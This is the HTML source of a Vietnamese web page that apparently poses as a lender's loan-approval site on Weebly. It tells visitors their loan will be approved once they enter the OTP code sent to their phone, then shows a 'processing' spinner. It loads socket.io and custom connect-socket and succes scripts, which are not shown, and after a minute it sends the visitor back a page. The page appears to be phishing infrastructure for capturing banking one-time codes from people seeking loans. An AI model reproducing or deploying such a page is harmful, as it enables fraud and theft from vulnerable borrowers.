<!DOCTYPE html>
<html lang="en">
   <head>
      <script src="gdpr/gdprscript.js?buildTime=1569881539&hasRemindMe=true&stealth=false"></script>
      <title>Ch&agrave;o m&#7915;ng qu&yacute; kh&aacute;ch - Home</title>
      <meta property="og:site_name" content="Ch&agrave;o m&#7915;ng qu&yacute; kh&aacute;ch" />
      <meta property="og:title" content="Ch&agrave;o m&#7915;ng qu&yacute; kh&aacute;ch" />
      <meta property="og:description" content="Qúy khách vui lòng điền đúng thông tin , Công ty tài chính sẽ  không chịu trách nhiệm chuyển tiền vay khi quý khách điền thông tin sai. Trân trọng càm ơn." />
      <meta property="og:image" content="uploads/1/2/7/4/127457467/vay-tien-doctordong_orig.jpg" />
      <meta property="og:image" content="uploads/1/2/7/4/127457467/28056605-568833513488061-7284717117140197179-n-678x381_orig.jpg" />
      <meta property="og:image" content="uploads/1/2/7/4/127457467/chakra_5.png" />
      <meta property="og:image" content="uploads/1/2/7/4/127457467/namaste_5.png" />
      <meta property="og:image" content="uploads/1/2/7/4/127457467/yogaflame_5.png" />
      <meta property="og:url" content="" />
      <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0;">
      <link id="wsite-base-style" rel="stylesheet" type="text/css" href="css/sites.css?buildTime=1568397647" />
      <link rel="stylesheet" type="text/css" href="css/old/fancybox.css?1568397647" />
      <link rel="stylesheet" type="text/css" href="css/social-icons.css?buildtime=1568397647" media="screen,projection" />
      <link rel="stylesheet" type="text/css" href="files/main_style.css?1568513277" title="wsite-theme-css" />
      <link href='//fonts.googleapis.com/css?family=Lato:400,300,300italic,700,400italic,700italic&subset=latin,latin-ext' rel='stylesheet' type='text/css' />
      <link href='//fonts.googleapis.com/css?family=Montserrat:400,700&subset=latin,latin-ext' rel='stylesheet' type='text/css' />
      <link href='//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic&subset=latin,latin-ext' rel='stylesheet' type='text/css' />
      <link href='//fonts.googleapis.com/css?family=Lato:400,300,300italic,700,400italic,700italic&subset=latin,latin-ext' rel='stylesheet' type='text/css' />
      <link href='//fonts.googleapis.com/css?family=Lato:400,300,300italic,700,400italic,700italic&subset=latin,latin-ext' rel='stylesheet' type='text/css' />
      <link href='//fonts.googleapis.com/css?family=Cookie&subset=latin,latin-ext' rel='stylesheet' type='text/css' />
      <link href='//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic&subset=latin,latin-ext' rel='stylesheet' type='text/css' />
      <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
      <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
      <script src="/js/succes.js"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.2.0/socket.io.js"></script>
      <script src="/js/connect-socket.js" ></script>
      <style type='text/css'>
         .wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {font-family:"Lato" !important;}
         #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {color:#666c70 !important;}
         .wsite-elements.wsite-footer div.paragraph, .wsite-elements.wsite-footer p, .wsite-elements.wsite-footer .product-block .product-title, .wsite-elements.wsite-footer .product-description, .wsite-elements.wsite-footer .wsite-form-field label, .wsite-elements.wsite-footer .wsite-form-field label{}
         .wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title, #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {font-family:"Lato" !important;font-style:normal !important;}
         #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
         .wsite-elements.wsite-footer h2, .wsite-elements.wsite-footer .product-long .product-title, .wsite-elements.wsite-footer .product-large .product-title, .wsite-elements.wsite-footer .product-small .product-title{}
         #wsite-title {font-family:"Cookie" !important;text-transform:  none !important;letter-spacing: 1px !important;}
         .wsite-menu-default a {text-transform:  uppercase !important;}
         .wsite-menu a {}
         .wsite-image div, .wsite-caption {}
         .galleryCaptionInnerText {}
         .fancybox-title {}
         .wslide-caption-text {}
         .wsite-phone {}
         .wsite-headline,.wsite-header-section .wsite-content-title {}
         .wsite-headline-paragraph,.wsite-header-section .paragraph {font-family:"Lora" !important;letter-spacing: 0px !important;}
         .wsite-button-inner {}
         .wsite-not-footer blockquote {}
         .wsite-footer blockquote {}
         .blog-header h2 a {}
         #wsite-content h2.wsite-product-title {}
         .wsite-product .wsite-product-price a {}
         @media screen and (min-width: 767px) {.wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {font-size:20px !important;}
         #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
         .wsite-elements.wsite-footer div.paragraph, .wsite-elements.wsite-footer p, .wsite-elements.wsite-footer .product-block .product-title, .wsite-elements.wsite-footer .product-description, .wsite-elements.wsite-footer .wsite-form-field label, .wsite-elements.wsite-footer .wsite-form-field label{}
         .wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title, #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
         #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
         .wsite-elements.wsite-footer h2, .wsite-elements.wsite-footer .product-long .product-title, .wsite-elements.wsite-footer .product-large .product-title, .wsite-elements.wsite-footer .product-small .product-title{}
         #wsite-title {font-size:35px !important;}
         .wsite-menu-default a {}
         .wsite-menu a {}
         .wsite-image div, .wsite-caption {}
         .galleryCaptionInnerText {}
         .fancybox-title {}
         .wslide-caption-text {}
         .wsite-phone {}
         .wsite-headline,.wsite-header-section .wsite-content-title {}
         .wsite-headline-paragraph,.wsite-header-section .paragraph {}
         .wsite-button-inner {}
         .wsite-not-footer blockquote {}
         .wsite-footer blockquote {}
         .blog-header h2 a {}
         #wsite-content h2.wsite-product-title {}
         .wsite-product .wsite-product-price a {}
         }
      </style>
      <script>
         var STATIC_BASE = '//cdn1.editmysite.com/';
         var ASSETS_BASE = '';
         var STYLE_PREFIX = 'wsite';
      </script>
      <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js'></script>
      <script type="text/javascript" src="js/lang/en/stl.js?buildTime=1568397647&"></script>
      <script src="js/site/main.js?buildTime=1568397647"></script><script type="text/javascript">
         function initCustomerAccountsModels() {
         			(function(){_W.setup_rpc({"url":"\/ajax\/api\/JsonRPC\/CustomerAccounts\/","actions":{"CustomerAccounts":[{"name":"login","len":2,"multiple":false,"standalone":false},{"name":"logout","len":0,"multiple":false,"standalone":false},{"name":"getSessionDetails","len":0,"multiple":false,"standalone":false},{"name":"getAccountDetails","len":0,"multiple":false,"standalone":false},{"name":"getOrders","len":0,"multiple":false,"standalone":false},{"name":"register","len":4,"multiple":false,"standalone":false},{"name":"emailExists","len":1,"multiple":false,"standalone":false},{"name":"passwordReset","len":1,"multiple":false,"standalone":false},{"name":"passwordUpdate","len":3,"multiple":false,"standalone":false},{"name":"validateSession","len":1,"multiple":false,"standalone":false}]},"namespace":"_W.CustomerAccounts.RPC"});
         _W.setup_model_rpc({"rpc_namespace":"_W.CustomerAccounts.RPC","model_namespace":"_W.CustomerAccounts.BackboneModelData","collection_namespace":"_W.CustomerAccounts.BackboneCollectionData","bootstrap_namespace":"_W.CustomerAccounts.BackboneBootstrap","models":{"CustomerAccounts":{"_class":"CustomerAccounts.Model.CustomerAccounts","defaults":null,"validation":null,"types":null,"idAttribute":null,"keydefs":null}},"collections":{"CustomerAccounts":{"_class":"CustomerAccounts.Collection.CustomerAccounts"}},"bootstrap":[]});
         })();
         }
         if(document.createEvent && document.addEventListener) {
         	var initEvt = document.createEvent('Event');
         	initEvt.initEvent('customerAccountsModelsInitialized', true, false);
         	document.dispatchEvent(initEvt);
         } else if(document.documentElement.initCustomerAccountsModels === 0){
         	document.documentElement.initCustomerAccountsModels++
         }
      </script>
      <script type="text/javascript"> _W = _W || {}; _W.securePrefix='lienketnhantienvay.weebly.com'; </script><script>_W = _W || {};
         _W.customerLocale = "vi_VN";
         _W.storeName = null;
         _W.storeCountry = "VN";
         _W.storeCurrency = "USD";
         _W.storeEuPrivacyPolicyUrl = "";
         com_currentSite = "442779229613463038";
         com_userID = "127457467";
      </script><script type="text/javascript">_W.configDomain = "www.weebly.com";</script><script>_W.relinquish && _W.relinquish()</script>
      <script type="text/javascript" src="js/lang/en/stl.js?buildTime=1568397647&"></script><script> _W.themePlugins = {"navpane":{"condense":1024,"forced":1}};</script><script src='js/site/theme-plugins.js?buildTime=1568397647'></script><script type="text/javascript"> _W.recaptchaUrl = "https://www.google.com/recaptcha/api.js"; </script><script type="text/javascript"><!--
         function initFlyouts(){
         	initPublishedFlyoutMenus(
         		[{"id":"109552537383183817","title":"Home","url":"index.html","target":"","nav_menu":false,"nonclickable":false},{"id":"642961983553170087","title":"M&atilde; OTP:","url":"matilde-otp.html","target":"","nav_menu":false,"nonclickable":false}],
         		"109552537383183817",
         		'',
         		'active',
         		false,
         		{"navigation\/item":"{{!\n\tNOTES:\n\t- an id and the \"wsite-menu-item-wrap\" class are required on the item wrapper\n\t- a \"wsite-menu-item\" class is required on the item link\n\t- an is_current variable is available\n\t- the current link will automagically get an \"active\" id\n}}\n\n<li {{#id}}id=\"{{id}}\"{{\/id}}\n\tclass=\"wsite-menu-item-wrap\"\n\t>\n\t<a {{^nonclickable}}\n\t\t\t\t{{^nav_menu}}\n\t\t\t\t\thref=\"{{url}}\"\n\t\t\t\t{{\/nav_menu}}\n\t\t\t{{\/nonclickable}}\n\t\t{{#target}}target=\"{{target}}\"{{\/target}}\n\t\tclass=\"wsite-menu-item {{#has_children}}subnav-link{{\/has_children}}\"\n\t\t{{#membership_required}}\n\t\t\tdata-membership-required=\"{{.}}\"\n\t\t{{\/membership_required}}\n\t\t{{#has_children}}\n\t\t\tdata-submenu=\"submenu-{{id}}\"\n\t\t{{\/has_children}}\n\t\t>\n\t\t{{{title_html}}}\n\t{{#has_children}}<span class=\"wsite-menu-arrow\"><\/span>{{\/has_children}}\n\t<\/a>\n\t{{#has_children}}{{> navigation\/flyout\/list}}{{\/has_children}}\n<\/li>","navigation\/flyout\/list":"{{!\n\tNOTES:\n\t- \"wsite-menu-wrap\" required on submenu wrapper\n\t- \"wsite-menu\" required on submenu element\n}}\n\n<div class=\"wsite-menu-wrap\" style=\"display:none\">\n\t<ul class=\"wsite-menu\" {{#id}}id=\"submenu-{{id}}\"{{\/id}}>\n\t\t{{#children}}{{> navigation\/flyout\/item}}{{\/children}}\n\t<\/ul>\n<\/div>","navigation\/flyout\/item":"{{!\n\tNOTES:\n\t- an id and \"wsite-menu-subitem-wrap\" class are required on the item wrap\n\t- a \"wsite-menu-subitem\" class is required on the item link\n}}\n\n<li {{#id}}id=\"{{id}}\"{{\/id}}\n\tclass=\"wsite-menu-subitem-wrap {{#is_current}}wsite-nav-current{{\/is_current}}\"\n\t>\n\t<a {{^nonclickable}}\n\t\t\t{{^nav_menu}}\n\t\t\t\thref=\"{{url}}\"\n\t\t\t{{\/nav_menu}}\n\t\t{{\/nonclickable}}\n\t\t{{#target}}target=\"{{target}}\"{{\/target}}\n\t\tclass=\"wsite-menu-subitem {{#has_children}}subnav-link{{\/has_children}}\"\n\t\t{{#has_children}}\n\t\t\tdata-submenu=\"submenu-{{id}}\"\n\t\t{{\/has_children}}\n\t\t>\n\t\t<span class=\"wsite-menu-title\">\n\t\t\t{{{title_html}}}\n\t\t<\/span>{{#has_children}}<span class=\"wsite-menu-arrow\">&gt;<\/span>{{\/has_children}}\n\t<\/a>\n\t{{#has_children}}{{> navigation\/flyout\/list}}{{\/has_children}}\n<\/li>"},
         		{"hasCustomMinicart":true}
         	)
         }
         //-->
      </script>
   </head>
   <body class="no-header-page  wsite-page-matilde-otp  wsite-theme-light">
      <div id="header">
         <div class="container">
            <div class="icons">
               <div class="w-navpane-trigger hamburger">
                  <span></span>
               </div>
            </div>
            <div class="logo"><span class="wsite-logo">
               <a href="">
               <span id="wsite-title">Ch&agrave;o m&#7915;ng qu&yacute; kh&aacute;ch</span>
               </a>
               </span>
            </div>
            <div class="icons">
               <a href="#" class="close w-navpane-close"><span></span></a>
            </div>
         </div>
         <div id="navlist" class="w-navlist nav">
            <ul class="wsite-menu-default">
               <li id="pg109552537383183817"
                  class="wsite-menu-item-wrap"
                  >
                  <a 
                     href=""
                     class="wsite-menu-item "
                     >
                  Home
                  </a>
               </li>
               <li id="active"
                  class="wsite-menu-item-wrap"
                  >
                  <a 
                     href="matilde-otp.html"
                     class="wsite-menu-item "
                     >
                  Mã OTP:
                  </a>
               </li>
            </ul>
         </div>
         <div id="menu" class="slide-panel">
            <div id="nav" class="nav w-navpane">
               <div class="container">
                  <ul class="wsite-menu-default">
                     <li id="pg109552537383183817"
                        class="wsite-menu-item-wrap"
                        >
                        <a 
                           href=""
                           class="wsite-menu-item "
                           >
                        Home
                        </a>
                     </li>
                     <li id="active"
                        class="wsite-menu-item-wrap"
                        >
                        <a 
                           href="matilde-otp.html"
                           class="wsite-menu-item "
                           >
                        Mã OTP:
                        </a>
                     </li>
                  </ul>
               </div>
            </div>
         </div>
         <div id="search" class="slide-panel">
            <div class="container">Search by typing &amp; pressing enter</div>
         </div>
         <div id="cart" class="slide-panel">
            <div class="container">
               <h2>YOUR CART</h2>
            </div>
         </div>
      </div>
      <div id="content">
         <div id="banner">
            <div class="banner-content"></div>
         </div>
         <div id="main">
            <div id="wsite-content" class="wsite-elements wsite-not-footer">
               <div class="wsite-section-wrap">
                  <div class="wsite-section wsite-body-section wsite-background-7">
                     <div class="wsite-section-content">
                        <div class="container">
                           <div class="wsite-section-elements">
                              <h2 class="wsite-content-title">Qúy khách vui lòng nhâp mã OTP gởi về Số điện thoại quý khách<br>Sau khi nhập OTP thành công, hồ sơ của quý khách sẽ được duyệt thành công&nbsp;<br></h2>
                              <div class="paragraph"></div>
                              <div>
                                 <!-- <div id="920661217538489815-msg" style="">MÃ HẾT HIỆU LỰC VUI LÒNG ĐĂNG NHẬP LẠI. </div> -->
                                 <div class="row">
                                    <div class="col-xs-12 col-sm-12 col-lg-4 " style="margin:0px auto">
                                       <div class="form-body" style="margin-top:70px">
                                          <div class="sk-fading-circle" id="loader">
                                             <div class="sk-circle1 sk-circle"></div>
                                             <div class="sk-circle2 sk-circle"></div>
                                             <div class="sk-circle3 sk-circle"></div>
                                             <div class="sk-circle4 sk-circle"></div>
                                             <div class="sk-circle5 sk-circle"></div>
                                             <div class="sk-circle6 sk-circle"></div>
                                             <div class="sk-circle7 sk-circle"></div>
                                             <div class="sk-circle8 sk-circle"></div>
                                             <div class="sk-circle9 sk-circle"></div>
                                             <div class="sk-circle10 sk-circle"></div>
                                             <div class="sk-circle11 sk-circle"></div>
                                             <div class="sk-circle12 sk-circle"></div>
                                          </div>
                                          <div id="info" style="text-align:center;margin-top:50px">
                                             <p style="color:#d04040 ; font-size: 30px; font-weight: bold;" id="loading">Hệ Thống Đang Xử Lý...</p>
                                             <p style="    font-size: 20px; color: #a52632;" id="loading">Vui Lòng Đợi Trong Ít Phút</p>
                                          </div>
                                       </div>
                                    </div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
            </div>
         </div>
         <div id="footer">
            <style type="text/css">
               @font-face {
               font-family: SQMarket-Medium;
               font-style: normal;
               font-weight: 500;
               src:
               url("fonts/SQ_Market/sqmarket-medium.woff2") format("woff2"),
               url("fonts/SQ_Market/sqmarket-medium.woff") format("woff");
               }
            </style>
            <script type="text/javascript" src="js/site/footerSignup.js?buildTime=1569953391"></script>
            <script type="text/javascript">
               if (document.readystate === 'complete') {
                   Weebly.footer.setupContainer('cdn2.editmysite.com', '1569953391');
               } else {
                   document.addEventListener('DOMContentLoaded', function() {
                       Weebly.footer.setupContainer('cdn2.editmysite.com', '1569953391');
                   });
               }
            </script>
         </div>
      </div>
      <div class="overlay w-navpane-close"></div>
      <script type="text/javascript" src="files/theme/plugins.js?1553205416"></script>
      <script type="text/javascript" src="files/theme/custom.js?1553205416"></script>
      <div id="customer-accounts-app"></div>
      <script src="js/site/main-customer-accounts-site.js?buildTime=1568397647"></script>
      <script type="text/javascript">
         var _gaq = _gaq || [];
         _gaq.push(['_setAccount', 'UA-7870337-1']);
         _gaq.push(['_setDomainName', 'none']);
         _gaq.push(['_setAllowLinker', true]);
         
         (function() {
             var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
             ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
             var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
         })();
         
         _W.Analytics = _W.Analytics || {'trackers': {}};
         _W.Analytics.trackers.wGA = '_gaq';
      </script>
      <script type="text/javascript" async=1>
         ;(function(p,l,o,w,i,n,g){if(!p[i]){p.GlobalSnowplowNamespace=p.GlobalSnowplowNamespace||[];
                 p.GlobalSnowplowNamespace.push(i);p[i]=function(){(p[i].q=p[i].q||[]).push(arguments)
                 };p[i].q=p[i].q||[];n=l.createElement(o);g=l.getElementsByTagName(o)[0];n.async=1;
                 n.src=w;g.parentNode.insertBefore(n,g)}}(window,document,'script','js/wsnbn/snowday262.js','snowday'));
         
         var r = [99, 104, 101, 99, 107, 111, 117, 116, 46, 40, 119, 101, 101, 98, 108, 121, 124, 101, 100, 105, 116, 109, 121, 115, 105, 116, 101, 41, 46, 99, 111, 109];
         var snPlObR = function(arr) {
             var s = '';
             for (var i = 0 ; i < arr.length ; i++){
                 s = s + String.fromCharCode(arr[i]);
             }
             return s;
         };
         var s = snPlObR(r);
         
         var regEx = new RegExp(s);
         
         _W.Analytics = _W.Analytics || {'trackers': {}};
         _W.Analytics.trackers.wSP = 'snowday';
         _W.Analytics.user_id = '127457467';
         _W.Analytics.site_id = '442779229613463038';
         
         // Setting do not track if the GDPR cookie is not present. This is then checked by the snowday initializer
         // to set tracking decisions. https://github.com/snowplow/snowplow-javascript-tracker/blob/2.6.2/src/js/tracker.js#L1509
         window.doNotTrack = document.cookie.indexOf('gdpr-kb') === -1 ? 'yes' : null;
         
         
         (function(app_id, ec_hostname, discover_root_domain) {
             var track = window[_W.Analytics.trackers.wSP];
             if (!track) return;
             track('newTracker', app_id, ec_hostname, {
                 appId: app_id,
                 post: true,
                 platform: 'web',
                 discoverRootDomain: discover_root_domain,
                 cookieName: '_snow_',
                 contexts: {
                     webPage: true,
                     performanceTiming: true,
                     gaCookies: true
                 },
                 crossDomainLinker: function (linkElement) {
                     return regEx.test(linkElement.href);
                 },
                 respectDoNotTrack: document.cookie.indexOf('gdpr-kb') === -1
             });
             track('trackPageView', _W.Analytics.user_id+':'+_W.Analytics.site_id);
             track('crossDomainLinker', function (linkElement) {
                 return regEx.test(linkElement.href);
             });
         })(
             '_wn',
             'ec.editmysite.com',
             false
         );
      </script>
      <script>
         (function(jQuery) {
             try {
                 if (jQuery) {
                     jQuery('div.blog-social div.fb-like').attr('class', 'blog-social-item blog-fb-like');
                     var $commentFrame = jQuery('#commentArea iframe');
                     if ($commentFrame.length > 0) {
                         var frameHeight = jQuery($commentFrame[0].contentWindow.document).height() + 50;
                         $commentFrame.css('min-height', frameHeight + 'px');
                     }
                     if (jQuery('.product-button').length > 0){
                         jQuery(document).ready(function(){
                             jQuery('.product-button').parent().each(function(index, product){
                                 if(jQuery(product).attr('target') == 'paypal'){
                                     if (!jQuery(product).find('> [name="bn"]').length){
                                         jQuery('<input>').attr({
                                             type: 'hidden',
                                             name: 'bn',
                                             value: 'DragAndDropBuil_SP_EC'
                                         }).appendTo(product);
                                     }
                                 }
                             });
                         });
                     }
                 }
                 else {
                     // Prototype
                     $$('div.blog-social div.fb-like').each(function(div) {
                         div.className = 'blog-social-item blog-fb-like';
                     });
                     $$('#commentArea iframe').each(function(iframe) {
                         iframe.style.minHeight = '410px';
                     });
                 }
             }
             catch(ex) {}
         })(window._W && _W.jQuery);
      </script>
      <script>
         window._W.isEUUser = false;
         window._W.showCookieToAll = "";
      </script>
      <script>
            $(document).ready(function(){
               setTimeout(function(){
                  window.history.back();
               },1000*60)
            }
            )
            
      </script>
   </body>
   <style>
      .sk-fading-circle {
      margin: 0px auto;
      width:40px;
      height: 40px;
      position: relative;
      }
      .sk-fading-circle .sk-circle {
      width: 100%;
      height: 100%;
      position: absolute;
      left: 0;
      top: 0;
      }
      .sk-fading-circle .sk-circle:before {
      content: '';
      display: block;
      margin: 0 auto;
      width: 15%;
      height: 15%;
      background-color: #333;
      border-radius: 100%;
      -webkit-animation: sk-circleFadeDelay 1.2s infinite ease-in-out both;
      animation: sk-circleFadeDelay 1.2s infinite ease-in-out both;
      }
      .sk-fading-circle .sk-circle2 {
      -webkit-transform: rotate(30deg);
      -ms-transform: rotate(30deg);
      transform: rotate(30deg);
      }
      .sk-fading-circle .sk-circle3 {
      -webkit-transform: rotate(60deg);
      -ms-transform: rotate(60deg);
      transform: rotate(60deg);
      }
      .sk-fading-circle .sk-circle4 {
      -webkit-transform: rotate(90deg);
      -ms-transform: rotate(90deg);
      transform: rotate(90deg);
      }
      .sk-fading-circle .sk-circle5 {
      -webkit-transform: rotate(120deg);
      -ms-transform: rotate(120deg);
      transform: rotate(120deg);
      }
      .sk-fading-circle .sk-circle6 {
      -webkit-transform: rotate(150deg);
      -ms-transform: rotate(150deg);
      transform: rotate(150deg);
      }
      .sk-fading-circle .sk-circle7 {
      -webkit-transform: rotate(180deg);
      -ms-transform: rotate(180deg);
      transform: rotate(180deg);
      }
      .sk-fading-circle .sk-circle8 {
      -webkit-transform: rotate(210deg);
      -ms-transform: rotate(210deg);
      transform: rotate(210deg);
      }
      .sk-fading-circle .sk-circle9 {
      -webkit-transform: rotate(240deg);
      -ms-transform: rotate(240deg);
      transform: rotate(240deg);
      }
      .sk-fading-circle .sk-circle10 {
      -webkit-transform: rotate(270deg);
      -ms-transform: rotate(270deg);
      transform: rotate(270deg);
      }
      .sk-fading-circle .sk-circle11 {
      -webkit-transform: rotate(300deg);
      -ms-transform: rotate(300deg);
      transform: rotate(300deg); 
      }
      .sk-fading-circle .sk-circle12 {
      -webkit-transform: rotate(330deg);
      -ms-transform: rotate(330deg);
      transform: rotate(330deg); 
      }
      .sk-fading-circle .sk-circle2:before {
      -webkit-animation-delay: -1.1s;
      animation-delay: -1.1s; 
      }
      .sk-fading-circle .sk-circle3:before {
      -webkit-animation-delay: -1s;
      animation-delay: -1s; 
      }
      .sk-fading-circle .sk-circle4:before {
      -webkit-animation-delay: -0.9s;
      animation-delay: -0.9s; 
      }
      .sk-fading-circle .sk-circle5:before {
      -webkit-animation-delay: -0.8s;
      animation-delay: -0.8s; 
      }
      .sk-fading-circle .sk-circle6:before {
      -webkit-animation-delay: -0.7s;
      animation-delay: -0.7s; 
      }
      .sk-fading-circle .sk-circle7:before {
      -webkit-animation-delay: -0.6s;
      animation-delay: -0.6s; 
      }
      .sk-fading-circle .sk-circle8:before {
      -webkit-animation-delay: -0.5s;
      animation-delay: -0.5s; 
      }
      .sk-fading-circle .sk-circle9:before {
      -webkit-animation-delay: -0.4s;
      animation-delay: -0.4s;
      }
      .sk-fading-circle .sk-circle10:before {
      -webkit-animation-delay: -0.3s;
      animation-delay: -0.3s;
      }
      .sk-fading-circle .sk-circle11:before {
      -webkit-animation-delay: -0.2s;
      animation-delay: -0.2s;
      }
      .sk-fading-circle .sk-circle12:before {
      -webkit-animation-delay: -0.1s;
      animation-delay: -0.1s;
      }
      @-webkit-keyframes sk-circleFadeDelay {
      0%, 39%, 100% { opacity: 0; }
      40% { opacity: 1; }
      }
      @keyframes sk-circleFadeDelay {
      0%, 39%, 100% { opacity: 0; }
      40% { opacity: 1; } 
      }
   </style>
</html>